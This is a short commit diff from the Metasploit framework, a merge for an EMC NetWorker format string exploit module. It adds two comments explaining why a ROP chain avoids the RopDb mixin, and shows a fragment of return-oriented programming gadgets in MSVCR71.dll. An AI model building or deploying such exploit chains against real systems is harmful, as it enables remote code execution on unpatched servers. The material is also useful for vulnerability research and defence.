Merge remote branch 'jvazquez-r7/emc_networker_format_string'

bug/bundler_fix
Tod Beardsley 2012-11-05 16:03:56 -06:00
commit 70d53b4e2d
1 changed files with 2 additions and 0 deletions

View File

@ -86,6 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
rop_gadgets =
[
# rop chain generated with mona.py
# The RopDb mixin isn't used because there are badchars
# which must be avoided
0x7c354dab, # POP EBP # RETN [MSVCR71.dll]
0x7c354dab, # skip 4 bytes [MSVCR71.dll]
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]